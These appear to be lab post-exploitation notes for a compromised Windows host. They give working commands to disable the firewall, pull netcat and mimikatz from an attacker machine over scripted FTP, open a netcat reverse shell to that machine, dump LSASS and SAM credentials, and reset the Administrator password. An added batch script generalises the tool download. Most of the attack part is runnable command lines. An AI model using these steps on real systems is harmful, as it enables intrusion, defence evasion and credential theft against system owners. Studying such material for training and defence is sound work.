- ## Post exploitation
- 192.168.66.112
- • Disabled the target firewall (legacy "netsh firewall" context, valid on XP/2003; Vista and later use "netsh advfirewall set allprofiles state off" instead):
- • netsh firewall set opmode disable
- • Used the pre-installed Windows FTP client (ftp.exe) on .12 to pull netcat (nc.exe) and mimikatz from the attacker box at .31, then used nc.exe to spawn a second shell independent of the exploited process and mimikatz to dump the credentials on .12
- • ftp.exe is interactive and cannot be driven reliably from a netcat reverse shell, so each download was scripted with echo and run non-interactively with ftp -s: (commands below, entered via the reverse shell)
- echo open 192.168.66.31> ftp_get_nc.txt
- echo USER offsec>> ftp_get_nc.txt
- echo ftp>> ftp_get_nc.txt
- echo bin >> ftp_get_nc.txt
- echo GET nc.exe >> ftp_get_nc.txt
- echo bye >> ftp_get_nc.txt
- ftp -v -n -s:ftp_get_nc.txt
- --------------------------------------------------------------------------------
- echo open 192.168.66.31> ftp_get_mimikatz.txt
- echo USER offsec>> ftp_get_mimikatz.txt
- echo ftp>> ftp_get_mimikatz.txt
- echo bin >> ftp_get_mimikatz.txt
- echo GET mimikatz.exe >> ftp_get_mimikatz.txt
- echo bye >> ftp_get_mimikatz.txt
- ftp -v -n -s:ftp_get_mimikatz.txt
- • Used the following commands to spawn a shell which was independent of the exploited process
- start cmd /c nc.exe -nv 192.168.66.31 413 -e cmd.exe
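The two hand-written ftp_get_*.txt scripts above do the same thing with a different file name, so the download step is worth generalising. The batch file below is an added example, not part of the original notes: it builds the ftp.exe script for any number of files in one transfer, uses -n so the "user" line in the script does the login, forces binary mode, and then checks that each file really landed, because ftp.exe exits 0 even when a GET fails. The script name ftpget.bat and the %TEMP% scratch file are assumptions; the attacker-side FTP server and the offsec/ftp account are taken from the notes.

```batch
@echo off
setlocal
REM ftpget.bat (hypothetical name): fetch one or more files with the stock
REM Windows ftp.exe, run from the reverse shell on the target.
REM Usage: ftpget.bat ftp_host user password file [file ...]
if "%~4"=="" (
    echo Usage: %~nx0 ftp_host user password file [file ...]
    exit /b 1
)
set "FTPHOST=%~1"
set "FTPUSER=%~2"
set "FTPPASS=%~3"
shift & shift & shift
set "SCRIPT=%TEMP%\ftpget_%RANDOM%.txt"
set "FILES="

REM ftp -n disables auto-login, so the script logs in itself: "user" makes
REM ftp.exe prompt for a password, which it then reads from the next line.
REM (Passwords containing & < > | need escaping; keep them simple here.)
> "%SCRIPT%" echo open %FTPHOST%
>>"%SCRIPT%" echo user %FTPUSER%
>>"%SCRIPT%" echo %FTPPASS%
REM Binary mode: an ASCII-mode transfer corrupts nc.exe / mimikatz.exe.
>>"%SCRIPT%" echo binary

:nextfile
if "%~1"=="" goto transfer
>>"%SCRIPT%" echo get %~1
set "FILES=%FILES% %~1"
shift
goto nextfile

:transfer
>>"%SCRIPT%" echo bye
ftp -v -n -s:"%SCRIPT%"
del "%SCRIPT%"

REM ftp.exe returns 0 even when a GET fails (bad path, no permission, data
REM channel blocked by a firewall), so verify that each file actually arrived.
set RC=0
for %%F in (%FILES%) do (
    if exist "%%~F" (
        echo [+] got %%~F
    ) else (
        echo [-] missing %%~F
        set RC=1
    )
)
exit /b %RC%
```

Running "ftpget.bat 192.168.66.31 offsec ftp nc.exe mimikatz.exe" on .12 reproduces both downloads above in a single FTP session and reports any file that did not arrive. The file list is expanded with a plain for loop, so file names with spaces are not supported.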
- • Used the following mimikatz commands, in this order: enable SeDebugPrivilege (requires an administrative context), dump the credentials of logged-on users from LSASS, impersonate a SYSTEM token, and dump the local SAM hashes (lsadump::sam reads the SAM and SYSTEM hives and needs SYSTEM, hence the elevation first)
- • privilege::debug
- • sekurlsa::logonpasswords
- • token::elevate
- • lsadump::sam
- • Used the following command to change the password of the Administrator account over SAMR; /old is the NT hash of the empty string (31d6cfe0d16ae931b73c59d7e0c089c0), i.e. the account had a blank password, and /newpassword is the new cleartext password:
- • lsadump::changentlm /user:Administrator /old:31d6cfe0d16ae931b73c59d7e0c089c0 /newpassword:Administrator